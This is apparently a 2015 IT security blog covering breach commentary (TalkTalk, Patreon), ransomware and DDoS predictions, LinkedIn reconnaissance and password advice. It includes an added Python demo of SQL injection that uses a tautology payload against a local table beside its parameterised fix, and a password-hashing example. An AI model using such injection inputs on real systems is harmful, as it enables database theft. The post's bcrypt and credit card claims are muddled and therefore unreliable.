Wednesday 23 December 2015

Cyber security in 2016: Cyber extortion, data breaches and legal reform [Link - v3]

My comments around Cyber extortion were used in an interesting article for v3.


Cyber extortion

The rapid expansion of online tools available for purchase on the dark web, including ransomware and denial of service (DoS) programs, will increase the threat of extortion.

"Ransomware and DoS attacks will increase in frequency in the next year. There have been a growing number of blackmail attempts, threatening a company's resources with distributed DoS attacks if they are not paid a sum of money," warned Andrew Tang, service director at MTI Technology.

"They do not demand high levels of technical ability and the rewards can be great. Many companies cannot afford lengthy downtime on their servers and will pay the sum demanded, even without any guarantee that the attackers will not return."

Tuesday 22 December 2015

Biggest security fails of 2015 and a look ahead to emerging threats in 2016

This year has seen IT security at the forefront of the news agenda for all the wrong reasons. Various breaches and hackings such as those on TalkTalk, Carphone Warehouse and Ashley Madison have heightened discussion around IT security and the protection required to counter virtual incursions.

However, many of the attacks over the course of the year were avoidable. Had the companies in question been more diligent over their testing and security protocols, some of the breaches would not have been as successful.  

Security fails of 2015

The biggest security failing of 2015 is arguably the vulnerability of companies to simple web application attacks. Organisations with large volumes of online customer interactions were targets for web application attacks, through which cyber-criminals gain access to sensitive customer data. Techniques such as SQL injection and brute force were used to access valuable data for fraud or resale to third parties.

The other security failing this year has been phishing attacks, a method that can result in malware entering a network, leading to data theft. Phishing attacks can come in the form of a seemingly legitimate email from a company that redirects the user to a fake external site. Personal information will then be requested and captured for future brute force attacks.

Prevention is simple

Following simple guidelines such as those published by OWASP is the first step to prevention. Regular testing of web-facing applications before publishing them can also help avoid attacks such as the one on TalkTalk.

Education within the company and targeted solutions aimed at monitoring data exfiltration should be a priority. A company’s security cannot rely only on its security solutions as a shield – its workforce can and often will be a weak spot in its armour. Employee education on data governance, access and removal of data should be at the top of a company’s IT security resolutions for 2016.

Emerging security threats in 2016

As Ransomware threats are so effective, they are predicted to continue to increase in use in 2016, along with the level of sophistication behind attacks. This is especially the case as corrective measures to protect against attacks are rarely in place.

In addition, DDoS (distributed denial-of-service) attacks aimed at extracting data have been getting stronger and harder to defend against, as shown by the high profile TalkTalk and Carphone Warehouse breaches.

There have also been a growing number of blackmail attempts, threatening a company’s resources with DDoS attacks, unless they receive a sum of money.

What is interesting is that these two techniques do not demand high levels of technical ability, but the rewards can be great. Many companies cannot afford lengthy downtimes on their servers and will pay the sum demanded, even without any guarantee that the same attackers will not return.

Who will they affect the most?

Ransomware can affect a majority of computer users.  Assuming you will not be a victim of a cyber-attack is a major mistake and the risk of such an attack should be taken seriously.

Blackmail attacks/DDoS attacks, on the other hand, will target medium to large sized companies, who have the budget to pay the ransom money.

Invaluable security solutions for businesses in 2016

As Ransomware is predominantly distributed via email and the internet, a sandboxing solution is essential. The relevant solution has to be able to scan emails and internet traffic delivered to computers on the network, remote workers using a VPN or BYOD users, who use wireless or mobile connections.

Ransomware delivered through these infiltration techniques will execute with the credentials of the user who opens it, so there is a need to look at controlling administrative credentials on all computers, whether they are servers, workstations or laptops.

Monday 21 December 2015

Cyber-Security Predictions for 2016 [Link - Information Security Buzz]

I was asked to write a piece about Cyber Security predictions for 2016, which was published on Information Security Buzz.


Cyber-security Predictions for 2016

What will be the emerging IT security threats in 2016 and do you expect as many or even more attacks as in 2015?

Although Ransomware attacks have been talked about a lot in 2015, the number of attacks has risen significantly during Q4 2015. Ransomware attacks are so effective that the number of attacks will rise, as will the level of sophistication behind them, especially as corrective measures to protect against the attack are rarely in place.

DDoS (distributed denial-of-service) attacks aimed at extracting data have been getting stronger and harder to defend against, as evidenced by the high profile TalkTalk and Carphone Warehouse breaches.

There have also been a growing number of blackmail attempts, threatening a company’s resources with DDoS attacks unless they are paid a sum of money.

Ransomware and DDoS attacks will only increase in frequency in the next year. They do not demand high levels of technical ability and the rewards can be great. Many companies cannot afford lengthy downtimes on their servers and will therefore pay the sum demanded, even without any guarantee that the same attackers will not return.

Who will they affect the most?

Ransomware can affect a majority of computer users. Assuming you will not be a victim of a cyber-attack is a major mistake, and the risk of such an attack should be taken seriously.

Blackmail attacks with a threat of DDoS attacks will affect medium to large sized companies who have the budget to pay the sum of money demanded. The transaction is usually in the form of crypto-currency, bitcoin. The companies that have the same budget to invest in the right protection against these types of attacks are likely to be the ones under attack.

What security solutions will become invaluable to businesses in 2016?

As Ransomware is typically distributed via email, an email sandboxing solution will be required. The relevant solution has to be able to scan emails whether they are being delivered to computers on the network, remote workers using a VPN or BYOD users, who use wireless or cellular connections. As Ransomware will execute with the user-credentials of the user who opens it, there is a need to look at controlling administrative credentials of all computers, whether they are servers, workstations or laptops.

How will the IT security sector cope with the lack of talent in the UK?

There is not a lack of talent in the IT Security sector, but rather a lack of qualified talent. The challenge has been that advertised roles either require skills beyond many technical people or ask for specific certifications and accreditations. I believe there are many good universities in the UK producing excellent candidates for IT Security, as well as many people with the right aptitude and attitude to learn. Although this may not give companies the “right” skillsets immediately, they can be learnt with the right programme of education and mentorship.

Wednesday 2 December 2015

Questions about the Dark Web

What do large organisations need to understand about the dark web?

The term Dark Web has many sinister undertones, and it can be used for illegal activities. The World Wide Web that we know and use is accessible by a browser and is indexed using software called crawlers. Crawlers allow sites such as Google to know where websites are and the sort of content they contain. There are elements that cannot be indexed, such as dynamic content that is generated on the fly; this is often referred to as the Deep Web.

What do many fail to grasp at the moment?

The Dark Web contains sites that require specific software to access them, and the network is encrypted to conceal the activity, whether for privacy reasons or to cover illegal activities. It should also be considered that the Dark Web is tiny compared to the World Wide Web. A recent article estimated there are between 7,000 and 30,000 hidden sites on the Dark Web, equating to around 0.03% of the Web.

How can understanding this space help them stay secure? 

The Dark Web is often referenced as the location where stolen credentials are sold. Rather than monitor or access the Dark Web, it is more important to protect the data in the first place. Personal Identifiable Information (PII) should be encrypted, so that the information is rendered gibberish to the perpetrator. Many of the recent attacks that have allowed thousands of records to be stolen have been achieved using SQL Injection attacks. If information needs to be accessible from the internet, ensure OWASP standards are followed, ensure the website is tested by a penetration testing organisation and ensure critical data is encrypted.

Monday 26 October 2015

TalkTalk Breach

On Friday 23rd October 2015, it came to light that TalkTalk, the telecommunications and internet provider was subject to a significant cyber-attack.

Some facts have come to light since the disclosure of the attack:

Third time’s a charm
The latest attack was the third cyber-attack in the past 12 months. It is believed that this attack has allowed the attacker to steal four million records. It may also have been up to ten weeks since the cyber-attack occurred.

DDoS as a cover
A DDoS (Distributed Denial of Service) attack was used to overwhelm the existing perimeter solutions. The large volume of traffic overwhelms perimeter solutions such as firewalls and IDS/IPS, which are there to scan traffic and protect an organisation from malicious traffic. It seems there was either no DDoS mitigation solution in place or an inappropriate/inadequate one. DDoS attacks are often used as a subterfuge to mask the real nature of the attack. In this case, it looks as if the attacker is flooding a website, whereas the underlying attack is to exfiltrate customer data.

SQL Injection?
It is widely believed that the attack was on the application available on the internet, and that the attacker, using web application testing tools and a form of SQL injection attack, was able to access the data.

SQL is the language used to query databases, and an SQL injection is the ability to run a query of the attacker's choosing against the database through the application. Although the ability to run queries is very useful for a database administrator, it gives malicious attackers the ability to query and export a whole database. SQL injection attacks are typically possible due to bad administration practices and not properly protecting the database.
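To make the point concrete, here is an added example (not from the original post, and not TalkTalk's code) of the defect behind a typical SQL injection and its fix: the same customer lookup written once with string concatenation and once with a bound parameter, run against a constructed in-memory SQLite table. The table, column names and customer rows are invented for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration; these are not real customer records.
SAMPLE_CUSTOMERS = [
    ("Alice Example", "ACC-1001", "alice@example.invalid"),
    ("Bob Example", "ACC-1002", "bob@example.invalid"),
    ("Carol Example", "ACC-1003", "carol@example.invalid"),
]


def build_customer_db():
    """Create an in-memory customer table resembling a web portal's back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (name TEXT, account_no TEXT, email TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_CUSTOMERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, account_no):
    """The defect: user input is pasted into the SQL text, so the input can
    change the structure of the query instead of only supplying a value."""
    sql = (
        "SELECT name, account_no, email FROM customers "
        "WHERE account_no = '" + account_no + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, account_no):
    """The fix: a bound parameter is always treated as a value, never as SQL,
    so the same input matches nothing instead of matching every row."""
    sql = "SELECT name, account_no, email FROM customers WHERE account_no = ?"
    return conn.execute(sql, (account_no,)).fetchall()


def demo():
    """Run both lookups with a legitimate account number and with a hostile one."""
    conn = build_customer_db()
    legit = "ACC-1002"
    # Textbook tautology: the quote closes the literal and OR '1'='1' is true for every row,
    # which is how a single portal query turns into an export of the whole table.
    hostile = "' OR '1'='1"
    return {
        "vulnerable_legit": lookup_vulnerable(conn, legit),
        "vulnerable_hostile": lookup_vulnerable(conn, hostile),
        "safe_legit": lookup_parameterised(conn, legit),
        "safe_hostile": lookup_parameterised(conn, hostile),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {len(rows)} row(s) -> {rows}")
```

A web application penetration test of the kind the post recommends would find the first lookup by sending exactly this sort of input and observing that the row count changes.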

Comprehensive data on people
The customer data lost is incredibly comprehensive.  The list below shows the data the attacker was able to obtain.
  • Name
  • Address
  • Email Address
  • Telephone Number(s)
  • TalkTalk Account Number
  • TalkTalk Password
  • Bank Details
  • Partial Credit Card Details

The TalkTalk data wasn't encrypted, meaning the attacker was able to read all the above information.  The data was in clear text, offering no protection to the customer.

It is believed that the Police and BAE Systems are carrying out a forensic investigation on the attack, but this relies on how much of a digital footprint was left during the attack and whether it was recorded at the time.

As an organisation handling customer information, there are many actions that would help prior to an attack:

Identification of Data
With numerous databases, server shares, cloud storage solutions and user-created data, identifying important information, such as customers’ PII (Personal Identifiable Information) and financial information, is paramount.

Protection of Data
Once the important information has been identified, methods of protecting the data should be used.  Encryption of data, where the data is encoded using a unique key and can only be decoded with this key, makes the data useless without it.

Testing of Systems
As applications such as customer portals are exposed to the internet, they need to be tested by a third party organisation with little or no knowledge of the application. A Web Application Penetration Test could have highlighted some of the shortcomings of the web-facing applications, including testing for SQL injection.

When an organisation is under attack, a number of solutions could have prevented an attack similar to TalkTalk’s. 

Administrative Rights
It is often said that 100% of attacks have used administrative rights. There are Privileged Access Management solutions which will safeguard the administrative accounts and offer full traceability of which administrator has done what. A typical attack will either use administrative credentials the attacker has gained, or elevate the privileges of a normal user to administrative level.

Protection from DDoS
A DDoS (Distributed Denial of Service) is normally used by a malicious attacker to take a web presence offline, making a web service inaccessible. In the case of TalkTalk’s attack, it was used to cloak the underlying attack. A hybrid DDoS mitigation solution could have prevented such an attack.

Intrusion Detection
There are Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS), which are used to detect and identify malicious activity on the network, then try to block or stop that traffic, and report back. These are available as standalone solutions or as part of a UTM (Unified Threat Management) or Next-Generation Firewall solution. Sometimes the early warning of an attack can help prevent the loss from being so great.

Data Exfiltration
Data will need to be taken for a breach to have occurred, so a DLP (Data Loss Prevention) solution will monitor the vectors by which data can leave, such as web, email, USB, screenshots, printers, etc., and if the monitored data leaves in an atypical fashion, it will be quarantined and administrators alerted.

After the compromise, what options are available?

Logs & Forensics
Post attack, it’s important to know what has been lost and to prevent it from happening again. A SIEM (Security Information & Event Management) solution would be able to aggregate the logs from the various components of the network and apply a level of intelligence to the data. Some will be able to carry out a forensic analysis on the logs.

Understanding the attack will allow a more effective remediation plan to be created.

What now TalkTalk?
Reading the press following the TalkTalk attack, there is no understanding of the significance of the data loss. Although there is no requirement to encrypt the data, it doesn't mean that the information of your customers should not have been encrypted.

As a minimum, pentesting the application to find the vulnerability and encrypting the data so it is useless to the attacker would have spared TalkTalk the media attention.

There is a call for the government to do more to prevent cyber-attacks, but as highlighted here, the technologies are available to help prevent, gain visibility of or slow down the attack. The onus should not be on governments to protect the customer’s data; it should be on the service provider.

Tuesday 20 October 2015

"Hunted" - Technology View [Link - MTI Bytes]

A piece I wrote has been edited and used on the work blog:


Channel 4’s new reality show Hunted has gripped my attention since the first episode launched 6 weeks ago.  I'm particularly surprised by the amount of surveillance there is in the UK, allowing people to be traced or ‘hunted’ using data from mobile phone and ATM usage, number plate recognition, and CCTV footage. What I've found more concerning however, is the oblivious nature of the contestants to the digital footprint they are leaving, not dissimilar to the naivety of employees when it comes to safeguarding corporate data.

So, in a world driven by technology, how do you protect your personal and corporate digital footprint?

1. Manage your devices
Gone are the days of owning one mobile device, we live in a society where people juggle a plethora of devices at any given time. The mobile phone in particular has become the hub of many people’s lives; 66 per cent of people now own a smartphone. In a short period of time the mobile phone has evolved to support all work and personal activity from sharing files to tracking fitness goals, as well as still holding its primary function of making calls.

Ensuring your device is backed up regularly is one way to manage its contents and protect it against damage or theft. Backing up the device’s applications and data to a public cloud service safeguards contents and also adds an additional layer of security to your data.

2. Password protect
Despite the abundance of recent security hacks, the show brings attention to the number of people that still don’t have any security on their devices. Without any security measures, others can immediately access the device as well as personal and corporate data. Securing accounts with a password is an essential step to protecting data.

Using complex and different passwords across various accounts and devices also tightens security. Where possible, a two-step verification or authentication is preferable.

Applications such as KeePass can help remember any complex passwords you have.

3. Control browser history
If Internet anonymity is important, tools like the TOR network provide users with the ability to hide identity and usage. Internet performance and connectivity can be affected by products such as TOR, therefore consider whether the perceived cost of your history is worth it.

Browsers can also be set to delete search history either automatically or manually, as the search history is automatically cached. Most browsers have a private browsing feature, whereby the history is not stored and neither are cookies. The issue with cookies is that the information is read by other services, often for advertising. Remember, Internet history will never truly be private, as the ISP will track sites visited.

4. Information control
The social media revolution is leading to a generation of over-sharers. Think about the information you want on the Internet. Imagine what could happen if an unscrupulous person had access to your private information and what they could do with it. Sharing information you may use for added security protection, such as pet names, invites security threats.

It is essential to have prevention tools in place to control your digital footprint and to stop yourself from being ‘hunted’.

Thursday 15 October 2015

Another week, another data leak [Link - MTI Bytes]

Another piece I wrote for the work blog:

San Francisco-based crowdfunding platform, Patreon, is the latest casualty in a series of recent data breaches. The incident has seen hackers download and leak a 15GB user database containing names, addresses, email addresses and donation information. So far, the hack has exposed 2.3 million users and their personal data, with the exception of credit card details, passwords, social security numbers and tax information.

In response to the hack, Patreon Founder Jack Conte wrote:

“There was unauthorised access to registered names, email addresses, posts, and some shipping addresses. Additionally, some billing addresses that were added prior to 2014 were also accessed. We do not store full credit card numbers on our servers and no credit card numbers were compromised. Although accessed, all passwords, social security numbers and tax form information remain safely encrypted with a 2048-bit RSA key.”

The question arises: how can you protect certain data?

Importance of encryption

Due to Patreon safely encrypting the information using a 2048-bit RSA key, hackers have been unable to access or leak users’ passwords, social security numbers and tax information.

In other words, Patreon protects passwords via a password-hashing scheme called ‘bcrypt’. The key benefit of ‘bcrypt’ is that it is irreversible, which means it cannot be “decrypted”. In Patreon’s case, the company's decision not to store plaintext passwords explains why the hackers could access only certain types of information.

As a result of Patreon using ‘bcrypt’, an added layer of security protects the information, enabling passwords and credit card details to remain safe despite the hack. This additional security minimises the damage of the hack by securely protecting the most valuable information – the credit card details of millions of users.
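As an added illustration (not Patreon's code and not part of the original post), here is what "irreversible" means in practice: a plaintext credential store beside a salted, slow, one-way store, with a login check that never needs the password back. It uses PBKDF2-HMAC-SHA256 from Python's standard library as a stand-in for bcrypt, because bcrypt needs a third-party package; the property demonstrated (a leaked column does not give up the password) is the same.

```python
import hashlib
import hmac
import os

# Stand-in for bcrypt's work factor: how many PBKDF2 rounds to run.
# Assumed value for the demonstration; production deployments tune this upward.
ITERATIONS = 100_000


def store_plaintext(password):
    """What a poor implementation stores: the password itself.
    Anyone who dumps the table (for example via SQL injection) reads it directly."""
    return password


def store_hashed(password, salt=None):
    """What a bcrypt-style scheme stores: a random per-user salt plus a slow,
    one-way digest. The password cannot be recovered from this string."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # Self-describing record so the verifier knows the algorithm, rounds and salt.
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_hashed(stored, candidate):
    """Login check: recompute with the stored salt and rounds, then compare in
    constant time. At no point is the original password needed or revealed."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def leaked_value_reveals_password(stored_value, password):
    """Simulate an attacker reading a leaked column: is the password readable in it?"""
    return password in stored_value


def demo(password):
    """Contrast the two storage choices for one constructed password."""
    plain = store_plaintext(password)
    hashed = store_hashed(password)
    return {
        "plaintext_leaks": leaked_value_reveals_password(plain, password),
        "hashed_leaks": leaked_value_reveals_password(hashed, password),
        "login_still_works": verify_hashed(hashed, password),
        "wrong_password_rejected": not verify_hashed(hashed, password + "x"),
    }


if __name__ == "__main__":
    print(demo("correct horse battery staple"))  # constructed sample password
```

Two users with the same password get different stored values because the salts differ, so a leaked table does not even reveal which accounts share a password.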

Protect the test environment

The belief is that a publicly available debug version of the Patreon website led to the Patreon hack. Essentially, some of the site remained open, as part of a test environment, rather than behind a firewall.

Patreon’s data compromise highlights that test environments exposed to the Internet are just as important as their live counterparts. Security therefore needs to be tight, even on test sites. Web application firewalls and Data Loss Protection (DLP) solutions can help prevent data from leaving the site, ensuring that it is kept secure and is often the first line of defense for any company.

While the Patreon hack is undeniably a terrible breach of security, the company’s use of ‘bcrypt’ is helping to contain the damage, and highlights to other businesses the importance of good security practice.

Wednesday 7 October 2015

How to minimise the risks of LinkedIn - The Hackers Research Tool [Link - SC Magazine]

I'm very proud the article I wrote was used by SC Magazine.


Staff need ongoing training in defending against the latest threats - which currently includes LinkedIn says Andrew Tang, service director, security at MTI Technology

LinkedIn, the social media platform, is proving to be a very useful networking tool for business professionals, with a growing database of approximately 380 million users worldwide. The site encourages members to freely share their CV, not just with their network but publicly online.

It is also becoming an attractive platform for organised crime gangs.  Recently, there have been several cases where hackers have used information gathered from LinkedIn to plan targeted attacks on companies.

Hackers have been found posing as large corporations on the site to entice unsuspecting executives to divulge useful information. Sometimes the hackers don't even need to lure victims by posing as large corporations, they can gather enough personal information from public profiles to scam money or access sensitive corporate data.

These forms of attacks are proving to be a headache for security professionals. Despite having the best tools and processes in place, it is particularly hard to protect information that sits outside of the company network. It can also take months or even years to find the leak.

Risky business

Most employees are now well aware of the security risks associated with revealing too much personal information on social media sites such as Facebook. However, they often don't realise that revealing corporate information on LinkedIn can be equally risky to businesses.

LinkedIn pages can provide a considerable level of detail to potential cyber attackers: names, job titles, email addresses, partnering organisations, upcoming projects, and even hobbies and interests. At first glance, this information might seem relatively trivial but it can form part of the ‘cyber kill chain’ and lead to malicious attacks.

LinkedIn informs the ‘plan of attack’. Employee and company profile pages can help hackers identify a target; source the names of executives and department heads; learn the email structure; as well as the names of affiliated companies. This leaves organisations vulnerable to a range of cyber-attacks including spear phishing.

Human error

Most worryingly perhaps, this issue isn't one that can be simply remedied with protective software. No technical solution can prevent an attacker from conducting an Internet search.

LinkedIn and other social media profiles are often among the first to appear in a list of search engine hits. Once the attacker has deployed the malicious software, cajoled an employee and gained remote access, the key goal is theft, whether of further information, money or data.

Education is the answer

As our virtual presence continues to grow, organisations need to make all employees aware of the potential risks of company details falling into the wrong hands. In order to mitigate the risks of social media sites, without blocking them, which will only frustrate employees, organisations must establish a clear security policy.

To safeguard company information and data, enterprises should educate employees about attending more closely to what they wish to make visible to whom.

If employees are informed, they are far more likely to be consciously aware of the risks as they go about their daily duties and, knowing the rationale, they are less likely to breach the policy.

The world of IT and security is certainly not static and training should not be a one off activity for new employees. Organisations should consider a continuing programme of education, updating the employees on new threats and breaches on a regular basis.

As more of our private lives are made public and readily available on the Internet, education becomes the vital component.

Wednesday 30 September 2015

“Hunted” - A technology view

How many of you have been watching Hunted on Channel 4? I have been an avid viewer since the first episode and have to say it was an eye opener. I was surprised how much surveillance there is in the UK, allowing people to be traced by mobile phone and ATM usage, number plate recognition and CCTV footage, but more concerning was the digital footprint people were leaving, where every step could be traced.

The mobile phone has become the hub of many people’s lives. In a short period of time it has gone from being a device to make calls, which could then send text messages and play Snake, to being the hub of all communications, such as work email, personal email, social media, text and picture messages, video calls, tracking our movements for fitness, our music, video and photograph repositories, and we sometimes even use them for telephone calls!

I know that if I misplace my mobile phone, I’m at a loss, but that’s probably the subject of another blog post.  In the show, they talk about phone tapping and triangulation, but more concerning was how people didn’t have any security on their devices, allowing access immediately onto the device.

Smartphones are lost or damaged on a seemingly regular basis, but thankfully there is the option to back up the device’s applications and data to a public cloud service.  This functionality is offered by the main operating system providers, such as Google, Apple and Microsoft, as well as manufacturers such as HTC.  This can only be a good thing, except if someone has access to your password, where the backup can be restored.  This would give access to text messages, browser history, and other private and sensitive information.

Unless you are paranoid or technical, you probably have a web based email account provided by Google, Microsoft, Yahoo, etc., as the convenience of a web based email account outweighs any benefits of running your own mail server for your own domain.

Internet based services are easy to reach, offering convenience, but this also means that you are open to having your account compromised by a hacker. On the show, access to one email account was gained immediately as the password had been saved by the browser.

A recent episode showed the use of a phishing attack, where a seemingly legitimate email was sent with a link, which led to a website asking for a password.  As most people use the same password for multiple websites, having one password can open access to many online accounts.

Google searches
In the show, internet searches were used to discover what the user was researching prior to being hunted.

I’ve never been worried about what I’ve been searching for on the internet, but if you are, there are privacy services offered by the major browsers.  Although it will mean that your searches are not cached and no cookies will be stored, the provider and the ISP (Internet Service Provider) you’re using will know, as they have to deliver this service.  

If Internet anonymity is important, then using tools like the TOR network, with their software and thousands of routers, gives the ability to hide identity and usage. This can be great for privacy, but can be a threat to national security.

Social media
The social media revolution allowed us to find our friends and share information. For people to find you, you have to place a certain amount of information on the internet, but many people over-share, leaving a lot of information about themselves on the internet.

The researchers on the show used internet searches to see what they could find about the subject. When that wasn't enough they also used the user's devices for access to social media accounts, where again passwords were either saved by the browser or written down on a piece of paper nearby.

Location Services
The ability for your apps to have location information improves the app experience. One of the primary uses is for mapping, allowing the device to be located on a map. It’s not commonly known that location services are typically switched on for a mobile phone camera. This has a use if you are taking a photograph to share on social media, telling everyone where the photograph was taken. The downside is that the properties of the photograph show the location, which may not be welcome if you don’t want people knowing where the photograph was taken.

I haven’t seen this used on the show, but it would have been useful in locating people beyond the mobile phone triangulation and number plate recognition.

Protecting Mobile Devices 
Smartphones are ubiquitous, but are incredibly powerful devices we have in our pockets.  I met someone recently who didn't trust smartphones so has a non-smart mobile phone.  There are some simple measures that can be used to protect the device.  

Create a PIN or password for the device. Yes, it can be a pain, but it’s protecting the device and its contents. You will be able to set the device to wipe itself if an incorrect PIN/password is entered a number of times.

Ensure your device is backed up regularly, so even if the device is lost or stolen, the data won’t be. This cloud storage and cloud backup account must have a strong password, and there is often the option to use two-step verification, where a code is sent via SMS to the registered mobile device. If it’s too easy for you to access the account, it’s too easy for a hacker to access it as well.

Protecting Email 
Sounds like simple advice, but harder to execute.  Use different complex passwords for each of your online accounts, don’t allow your browser to remember the passwords, and switch on two step or two factor authentication where possible.  

There are applications to help remember complex passwords, although even a popular one, KeePass, was recently reported to have a security flaw.  Even so, don't write down your passwords, and certainly don't keep them next to your computer or tablet!

As ever, ensure the sites asking for your passwords are legitimate sites, and simply delete anything that looks “fishy”!

Protecting Browser History 
Browsers can be set to delete the history either automatically or manually, as browsing and search history is cached by default.  Most browsers also have a private browsing mode, where the history is not stored and neither are cookies, the small files typically created when visiting a website.  The issue with cookies is that those set by third-party advertising networks embedded in many sites let those networks follow you from site to site.  For example, if you search for a computer game, you will see advertisements for that game on subsequent websites; that information is stored in a cookie and read back by the advertising service.  Keep in mind that the sites you visit can also be seen by the ISP delivering the content, so your Internet history will never be truly private.

TOR can provide anonymity to the user, but unless the connection is itself encrypted (HTTPS) the traffic and content can be seen at the exit node, and performance can be poor due to the bandwidth available.  It certainly won't offer the media and feature rich Internet experience we've come to expect.  If you have something to hide, TOR may be the way forward, but the sacrifice may not be worth it.

Protecting Social Media
Think about what information you want about you out on the internet.  Imagine if anyone could have full access to your profile: what could an unscrupulous person do with that information?  Is your password made up of your favourite team, band, child’s name, mother’s maiden name, pet’s name, etc.?  Then consider whether that information is on your public profile.  Set privacy settings to ensure only the people you want can see the information you want them to.

Protecting Location Information
If you need to hide your location but want to use social media, check the location services and whether they are enabled on your applications, especially your mobile/tablet apps.  Check the settings for your camera as well.  Even if location services are turned off for the social media app, the properties of a photograph can still contain the location where it was taken if the feature has not been disabled on the camera.

If you are really being hunted, then this is only basic advice, but much like the IT security adage “It’s not if, but when you’re hacked”, it may well be a case of: it’s not if they find you, but when!

Monday 28 September 2015

LinkedIn – the hacker’s research tool [Link - MTI Bytes]

Here is a repost of a piece I wrote for our work blog:


As of July 2015, LinkedIn has approximately 380 million users worldwide, a number that is continuing to grow. The social media platform is very useful for networking in the business world. It invites users to share their online CV with other industry professionals and establish contacts, publish industry commentary, and research potential employers or candidates.

The security risks of sharing personal details on other social media platforms like Facebook have been well documented, but for enterprises, LinkedIn can be equally dangerous. LinkedIn pages can provide a considerable level of detail to potential cyber attackers: names, job titles, email addresses, partnering organisations, upcoming projects, and even hobbies and interests. At first glance, this information might seem relatively trivial, but it forms part of the ‘cyber kill chain’ and can lead to malicious attacks.

For hackers, LinkedIn can inform the ‘plan of attack’. Employee and company profile pages can help hackers identify a target; source the names of executives and department heads; and learn the email structure; as well as the names of affiliated companies.

This leaves organisations vulnerable to a range of cyber attacks. One example is spear phishing: a targeted person receives an email inviting them to access a link, which initiates the installation of malicious software.

Socially engineered access
Emails apparently from known sources (a colleague, for example), combined with information about hobbies, can instil confidence in the targeted individuals, making them more likely to click on the link.

The name drop of the company CEO could create a false air of familiarity, which might spur someone to act hastily and neglect to follow the correct channels. It’s not hard to imagine that an IT helpdesk might grant a ‘known employee’ remote access in response to a pleading call or email to finish time-sensitive work on a Friday afternoon.

All the attacker needs is the name, job title and email address of a company employee, all of which are readily accessible on LinkedIn. In return, the attacker stands to make financial gains, steal data, or simply obtain confidential company information.

Human error
Most worrying, perhaps, is that this issue isn’t one that can simply be remedied with protective software. No technical solution can prevent an attacker from conducting an Internet search, and LinkedIn and other social media profiles are often among the first results to appear. Once the attacker has deployed the malicious software, cajoled an employee, or gained remote access, the goal is theft, whether of more information, money, or data.

Education is the answer
As our virtual presence continues to grow, there needs to be more awareness inside organisations of the risks of basic company details falling into the wrong hands. To safeguard company information and data, enterprises should attend more closely to what they wish to make visible, and to whom.

As more of our private lives are made public and readily available on the Internet, education becomes the vital component. Organisations should be looking to provide this level of training to all employees, or risk the consequences.

Monday 7 September 2015

Multi-factor authentication – a smart approach to IT security [Link - MTI Bytes]

Here is a repost of a piece I wrote for our work blog:


Last week, I wrote about the need for businesses to rethink the use of secret questions as a security measure. The Web and social media create a goldmine of user information, which astute hackers can access to answer security questions.

So, what is a preferable alternative for proving a user’s identity? One of the more effective methods is multi-factor authentication.

What is multi-factor authentication? 

Multi-factor authentication is a security system that requires two or more independent credentials to verify a user’s identity.

A user might, for example, be required to provide information that they already know, such as a username, password or PIN. Combined with this, they may be asked to provide information given to them from a token or device – a passcode sent via SMS to a known mobile phone, for instance.

Other authentication methods rely on something the user is, or where the user is located, through measures such as biometrics (iris scans, fingerprint readers) and geo-location.

A combination of any of these methods results in multi-factor authentication. It is already widely used for personal services such as email and banking, and in the US there have been calls for it to be mandated for all forms of Internet banking. Such is the confidence in this form of security.

What are the benefits of multi-factor authentication? 

1. Proof and compliance 

With multiple authentication methods in place, it becomes more difficult for hackers to access the service or website. It also makes it harder to deny an action.

For example, many online banking systems use a combination of passwords, PINs, tokens, SMS and unique codes, to ensure transactions are genuine. By using multi-factor authentication, banks can tie their compliance processes to specific users so the actions cannot be denied.

2. Protection can be free 

Service providers such as Apple's iCloud, Gmail, eBay and Facebook have options to switch on a two-step verification process. If a user tries to log in from a new device, browser or different country, they will be prompted to enter a code sent to their registered mobile phone number.  The security is there and it is free in many cases!

3. Cloud support

As more cloud-based applications like Salesforce and Microsoft Office 365 enter the workplace, security will become a more complex concern for IT decision-makers. Multi-factor authentication has a critical role to play in addressing some of these concerns. In fact, there are already federation standards such as SAML, designed specifically for cloud applications, which let the application hand sign-in over to the organisation's identity provider, where multi-factor authentication can be enforced.

What are you waiting for? 

Multi-factor authentication presents a very clear upgrade from the simple security question method. The shift to a multi-factor authentication method will add an extra layer of protection against security breaches.

Friday 4 September 2015

4 simple tips for bolstering your business’ security [Link - MTI Bytes]

Here is a repost of a piece I wrote for our work blog:


High-profile breaches continue to dominate the news agenda. Stories of compromises to email systems, retail outlets, Internet auction sites and Apple's iCloud service, show no online service is safe from hackers.

Many of these incidents are the result of accounts being far too easily accessible to hackers. Nowadays, these types of hacks are commonplace, and they will likely increase as social media uptake grows further. The more that users share personal information online, the more insecure security questions will become.

There are several issues associated with security question authentication that all businesses should address, through educating employees, as well as reviewing current security protocols and processes.

1. Avoid simple passwords

Despite repeated warnings from the IT industry, the most commonly used passwords in 2014 were ‘123456’ and ‘password’!  With such simple passwords, an account can be compromised within seconds using a dictionary attack.

2. Secret questions aren't so secret

On the surface, a personal security question may seem like a secure way to reset a password. However, what is often overlooked is the huge volume of personal information accessible via the Internet.

Consider, for example, the amount of information that Facebook alone archives about a user’s personal relationships, education, location, employment history and interests. Once a user’s information is out there, there is no way to control, edit or delete it.

A great example of this is the Paris Hilton phone-hacking scandal of 2005. In that case, the T-Mobile Sidekick device had an internet-facing dashboard. To recover their password, users had to answer security questions including their date of birth and pet’s name. In reality, all of Paris’ security questions could be answered via an Internet search engine!

3. Mix it up

There is always a balance between usability and complexity. We encourage people to use a mixture of upper and lower case letters, special characters and numbers. In reality, this usually results in more password resets, as complex passwords are easier to forget.

4. Be streetwise – does it seem phishy?

